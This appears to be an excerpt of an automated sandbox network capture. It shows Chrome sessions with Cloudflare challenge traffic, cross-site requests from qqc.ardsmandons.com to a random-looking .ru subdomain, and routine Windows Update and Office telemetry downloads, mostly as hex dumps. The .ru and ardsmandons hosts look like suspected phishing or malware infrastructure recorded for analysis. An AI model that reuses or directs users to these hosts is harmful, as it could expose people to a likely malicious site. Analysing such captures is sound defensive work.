                                                                                                                          2024-11-25 15:42:55 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 57 54 77 37 38 49 45 69 67 45 37 2f 4c 46 78 34 55 6b 35 50 36 44 31 74 7a 75 4b 31 4e 37 68 53 49 32 34 54 76 57 6a 35 6c 68 78 33 30 64 6a 46 6b 55 34 4c 30 6a 75 78 55 39 55 37 78 76 75 57 46 54 71 65 63 49 44 78 73 36 70 33 54 74 4c 32 6c 45 44 35 69 30 47 31 63 6e 73 4a 56 39 45 73 44 48 2b 49 6b 70 4f 35 73 62 61 35 7a 47 51 50 49 31 42 58 4c 69 41 3d 24 79 53 35 62 31 67 58 52 4e 67 6e 73 6d 59 34 62 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 38 32 63 30 35 61 65 61 66 39 35 65 37 39 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: cf-chl-out: WTw78IEigE7/LFx4Uk5P6D1tzuK1N7hSI24TvWj5lhx30djFkU4L0juxU9U7xvuWFTqecIDxs6p3TtL2lED5i0G1cnsJV9EsDH+IkpO5sba5zGQPI1BXLiA=$yS5b1gXRNgnsmY4bServer: cloudflareCF-RAY: 8e82c05aeaf95e79-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:55 UTC1193INData Raw: 52 55 69 48 56 49 68 2b 53 31 68 71 6b 30 74 69 61 4a 4e 69 6a 47 68 75 6a 6e 42 39 66 58 42 2b 62 56 32 69 67 5a 5a 7a 6f 4a 74 68 67 4a 69 45 72 57 42 37 6d 6e 36 47 73 61 6d 78 72 5a 2b 54 74 62 47 6a 6b 61 32 6e 74 35 4b 34 71 70 43 75 6b 59 58 46 75 72 2f 41 79 36 57 2f 78 5a 6d 2f 79 71 4f 67 76 71 48 51 31 63 44 50 6c 36 32 76 31 74 57 32 30 38 43 72 73 72 69 7a 7a 72 57 36 32 75 47 31 76 38 79 33 75 73 53 2f 36 74 76 47 36 38 6a 6a 31 75 76 48 2b 64 50 2b 79 4f 66 30 38 39 54 53 7a 66 62 57 39 2b 44 35 41 39 58 37 37 4e 62 4a 35 4f 4c 50 38 65 59 4e 44 2b 55 50 44 4f 77 45 45 52 48 76 38 66 67 41 34 67 2f 35 37 69 62 36 4a 51 50 32 39 79 50 74 49 69 55 67 34 2f 34 73 46 69 77 68 42 69 72 35 38 2f 55 79 2b 41 67 35 4b 77 77 37 39 53 31 46 47 55 67
                                                                                                                          Data Ascii: RUiHVIh+S1hqk0tiaJNijGhujnB9fXB+bV2igZZzoJthgJiErWB7mn6GsamxrZ+TtbGjka2nt5K4qpCukYXFur/Ay6W/xZm/yqOgvqHQ1cDPl62v1tW208CrsrizzrW62uG1v8y3usS/6tvG68jj1uvH+dP+yOf089TSzfbW9+D5A9X77NbJ5OLP8eYND+UPDOwEERHv8fgA4g/57ib6JQP29yPtIiUg4/4sFiwhBir58/Uy+Ag5Kww79S1FGUg
                                                                                                                          2024-11-25 15:42:55 UTC1369INData Raw: 64 6a 56 39 65 33 61 78 75 50 6f 44 42 4c 53 7a 4f 49 4c 2b 76 4c 6e 47 78 51 50 37 78 73 43 48 39 30 61 42 77 4c 78 49 4f 67 59 36 78 38 57 44 51 41 6c 4b 51 6f 71 4a 68 38 42 4e 44 41 79 4d 41 73 38 46 69 63 56 4d 52 4d 35 45 7a 63 2b 42 68 41 36 4e 42 6f 58 46 69 38 70 53 45 6c 4b 45 68 78 4c 4b 6b 4e 44 55 31 49 70 52 31 67 77 55 78 64 5a 48 7a 6c 67 4c 6d 41 39 51 47 59 39 51 7a 51 31 4c 45 55 76 63 46 74 4a 4b 6e 41 2b 59 30 74 76 54 6b 4e 4c 62 33 64 52 66 6e 52 57 59 57 39 33 51 59 42 54 69 45 56 4b 57 59 75 47 58 58 74 48 57 6d 47 4c 53 32 68 78 68 59 74 74 54 5a 75 54 6c 33 39 74 61 6c 2b 58 70 4a 56 36 67 5a 2b 69 6f 6e 57 62 6e 34 56 6f 68 4b 69 44 68 6f 4b 6c 6e 34 56 34 71 6e 5a 74 6d 49 61 32 6a 5a 61 4b 6c 4b 47 57 75 35 65 6e 6c 63 4b 62
                                                                                                                          Data Ascii: djV9e3axuPoDBLSzOIL+vLnGxQP7xsCH90aBwLxIOgY6x8WDQAlKQoqJh8BNDAyMAs8FicVMRM5Ezc+BhA6NBoXFi8pSElKEhxLKkNDU1IpR1gwUxdZHzlgLmA9QGY9QzQ1LEUvcFtJKnA+Y0tvTkNLb3dRfnRWYW93QYBTiEVKWYuGXXtHWmGLS2hxhYttTZuTl39tal+XpJV6gZ+ionWbn4VohKiDhoKln4V4qnZtmIa2jZaKlKGWu5enlcKb
                                                                                                                          2024-11-25 15:42:55 UTC1369INData Raw: 30 41 43 63 2f 78 47 4d 38 4a 45 76 45 4f 32 75 63 67 46 67 77 57 46 68 77 54 39 50 4d 70 45 51 6b 46 2b 68 66 33 48 75 67 61 45 51 77 72 48 52 55 41 4d 53 4d 76 42 65 30 59 4d 52 54 34 48 51 41 74 50 7a 77 44 4e 44 67 6b 49 53 5a 4b 42 68 64 51 4b 6a 4a 46 43 7a 56 45 49 7a 52 43 51 30 31 61 53 7a 31 53 4b 44 6c 4f 4d 44 45 33 57 47 56 62 49 32 64 6a 4b 54 52 6b 61 45 68 71 61 6b 46 6f 63 6a 30 73 51 6e 46 42 56 58 74 4e 57 46 42 58 58 6b 74 77 63 58 64 50 58 30 39 33 56 56 39 4a 59 6f 35 45 5a 6d 78 6b 61 4a 52 51 61 34 52 32 6b 56 5a 77 69 33 4f 4e 6c 58 6d 65 6c 33 4b 58 66 4a 74 6c 66 59 43 69 6f 4b 52 30 72 47 6c 6f 6a 71 47 71 6e 34 65 72 68 72 4f 31 67 70 74 74 6b 37 4b 6d 6a 61 36 30 6c 49 2b 4d 6a 5a 36 6a 6b 38 54 44 6e 5a 2b 2f 6f 71 32 4b 79
                                                                                                                          Data Ascii: 0ACc/xGM8JEvEO2ucgFgwWFhwT9PMpEQkF+hf3HugaEQwrHRUAMSMvBe0YMRT4HQAtPzwDNDgkISZKBhdQKjJFCzVEIzRCQ01aSz1SKDlOMDE3WGVbI2djKTRkaEhqakFocj0sQnFBVXtNWFBXXktwcXdPX093VV9JYo5EZmxkaJRQa4R2kVZwi3ONlXmel3KXfJtlfYCioKR0rGlojqGqn4erhrO1gpttk7Kmja60lI+MjZ6jk8TDnZ+/oq2Ky
                                                                                                                          2024-11-25 15:42:55 UTC549INData Raw: 56 37 4f 37 6f 44 68 58 34 2b 74 59 4c 49 2f 77 67 35 41 45 6c 4a 75 51 6a 2b 78 30 41 4a 50 73 71 48 42 33 38 4a 78 62 77 4c 6a 66 31 43 54 41 36 4b 69 38 41 4f 41 6f 4e 48 6a 6f 59 4d 77 49 2b 43 52 34 56 50 54 67 6c 52 6b 59 49 44 52 34 65 45 55 64 5a 44 79 30 31 53 6c 63 61 46 69 39 52 54 45 49 73 57 46 31 6e 57 47 59 6f 55 30 70 67 5a 55 63 39 59 30 52 67 51 57 78 67 53 55 35 77 61 46 5a 4b 62 56 4a 72 61 6a 34 2b 54 57 43 45 57 46 6c 79 55 6f 42 2f 66 45 4e 57 5a 58 75 4a 54 35 4f 55 69 34 35 78 63 5a 47 43 65 57 78 6c 66 33 71 5a 61 6d 43 44 62 71 43 6b 63 33 64 79 6b 33 56 6a 64 71 65 5a 66 4b 75 46 6b 33 39 39 72 34 57 35 73 36 4f 44 68 62 68 38 6b 34 79 37 67 4a 75 52 65 35 36 68 78 70 4b 49 74 5a 71 56 7a 4a 6d 4b 6d 63 75 62 6e 35 37 50 73 64
                                                                                                                          Data Ascii: V7O7oDhX4+tYLI/wg5AElJuQj+x0AJPsqHB38JxbwLjf1CTA6Ki8AOAoNHjoYMwI+CR4VPTglRkYIDR4eEUdZDy01SlcaFi9RTEIsWF1nWGYoU0pgZUc9Y0RgQWxgSU5waFZKbVJraj4+TWCEWFlyUoB/fENWZXuJT5OUi45xcZGCeWxlf3qZamCDbqCkc3dyk3VjdqeZfKuFk399r4W5s6ODhbh8k4y7gJuRe56hxpKItZqVzJmKmcubn57Psd


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.449776104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:57 UTC596OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:57 UTC379INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:57 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 7
                                                                                                                          Connection: close
                                                                                                                          cf-chl-out: n2EP5eSiC9c3JxxLueCqpddpreNmspzVQeE=$NeXfZvJcFxhVDkmO
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82c0683a4c8c5f-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:57 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                          Data Ascii: invalid


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.449778104.21.65.724434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:58 UTC670OUTGET /988387090550690360942vzLvHtGVHERARQUWXWDBFMNZLRVRYOYAYHSOXNLMIK HTTP/1.1
                                                                                                                          Host: 98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://qqc.ardsmandons.com
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://qqc.ardsmandons.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:59 UTC883INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:59 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cXAjEhoAOZLpPWSKnus1EbbAO9KYFDFxu%2F7X8hmmkS3X1iZZ49KtjlKZ3qe3R1hgiXf23BG3b7uBIdWaHtzvHBH1kP99tNBmeN%2FNwniQuCztZkyNRG6IaFkaMyj2PGU2Hfd7xYg%2Bx%2B%2FX0aiIA3%2FIeB9B2xlwwy5OL2%2B9WXXbG07APwjCdVBWBMMXJmQGMHkCGq8nT%2FtyFSLkfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82c072ecb742d0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1626&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1248&delivery_rate=1785932&cwnd=197&unsent_bytes=0&cid=ec2ec5d6319ae742&ts=900&x=0"
                                                                                                                          2024-11-25 15:42:59 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                          Data Ascii: 11
                                                                                                                          2024-11-25 15:42:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.449782104.21.65.724434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:02 UTC458OUTGET /988387090550690360942vzLvHtGVHERARQUWXWDBFMNZLRVRYOYAYHSOXNLMIK HTTP/1.1
                                                                                                                          Host: 98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:43:03 UTC893INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:03 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNJQfXijUe5wbCHu7ccvJz0EvadGW09%2BfFe%2BWqSjjP4NNDYw1bTfyTnNW%2ByP8RL3hroMd%2F9xvOkZ%2FZJo5g8iYyPxyDCob0JI%2FztDgF4QOuuk9xfIJ4z6U%2Bd3%2FGhOMom%2BJ2jcg4n9SbG%2BncQjZLUuAKcOzWrJhLxR1N1GEGzh7yy%2BojITkzp%2FIvoZ9njV5voKsj8Bzpoout5v%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82c0893cab15c7-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1715&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1036&delivery_rate=1702623&cwnd=252&unsent_bytes=0&cid=36b173f92032424a&ts=976&x=0"
                                                                                                                          2024-11-25 15:43:03 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                          Data Ascii: 11
                                                                                                                          2024-11-25 15:43:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.44978420.109.210.53443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:15 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1YtuxKSP5EdRDh+&MD=YkXyWXgC HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                          2024-11-25 15:43:15 UTC560INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Expires: -1
                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                          MS-CorrelationId: b025d65a-8299-492d-8fad-1cbaf576fdc1
                                                                                                                          MS-RequestId: e718cffb-94dd-43b2-af30-f19bcb4c94fe
                                                                                                                          MS-CV: 78QC0OPAlEyHLgca.0
                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:14 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 30005
                                                                                                                          2024-11-25 15:43:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                          2024-11-25 15:43:15 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          31192.168.2.44978513.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:15 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:15 UTC471INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:15 GMT
                                                                                                                          Content-Type: text/plain
                                                                                                                          Content-Length: 218853
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public
                                                                                                                          Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                                                                                          ETag: "0x8DD0BB889D4282C"
                                                                                                                          x-ms-request-id: c3062018-b01e-003e-79df-3d8e41000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154315Z-178bfbc474brk967hC1NYCfu6000000007e000000000fqgw
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:15 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                          Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                          Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                          Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                          2024-11-25 15:43:16 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                          Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
